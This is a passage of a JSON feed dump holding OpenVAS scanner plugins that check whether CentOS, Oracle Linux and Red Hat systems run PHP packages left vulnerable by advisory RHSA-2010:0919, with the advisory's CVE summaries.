((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:25", "description": "Oracle Linux Local Security Checks ELSA-2010-0919", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2010-0919", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122295", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122295", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0919.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122295\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:16:11 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0919\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0919 - php security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0919\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0919.html\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.1.6~27.el5_5.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-14T11:48:51", "description": "Check for the Version of php", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "RedHat Update for php RHSA-2010:0919-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2017-12-13T00:00:00", "id": "OPENVAS:870362", "href": "http://plugins.openvas.org/nasl.php?oid=870362", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for php RHSA-2010:0919-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n \n An information leak flaw was discovered in the PHP var_export() function\n implementation. If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n \n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n \n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n \n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n \n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n \n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"php on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-November/msg00035.html\");\n script_id(870362);\n script_version(\"$Revision: 8092 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-13 07:31:16 +0100 (Wed, 13 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0919-01\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"RedHat Update for php RHSA-2010:0919-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pear\", rpm:\"php-pear~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:54:40", "description": "Check for the Version of php", "cvss3": {}, "published": "2010-12-09T00:00:00", "type": "openvas", "title": "RedHat Update for php RHSA-2010:0919-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2017-12-25T00:00:00", "id": "OPENVAS:1361412562310870362", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870362", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for php RHSA-2010:0919-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n \n An information leak flaw was discovered in the PHP var_export() function\n implementation. If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n \n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n \n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n \n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n \n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n \n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"php on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-November/msg00035.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870362\");\n script_version(\"$Revision: 8244 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 08:29:28 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-09 08:26:35 +0100 (Thu, 09 Dec 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2010:0919-01\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"RedHat Update for php RHSA-2010:0919-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.1.6~27.el5_5.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-debuginfo\", rpm:\"php-debuginfo~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~4.3.9~3.31\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-domxml\", rpm:\"php-domxml~4.3.9~3.31\", rls:\"RHENT_4\")) != 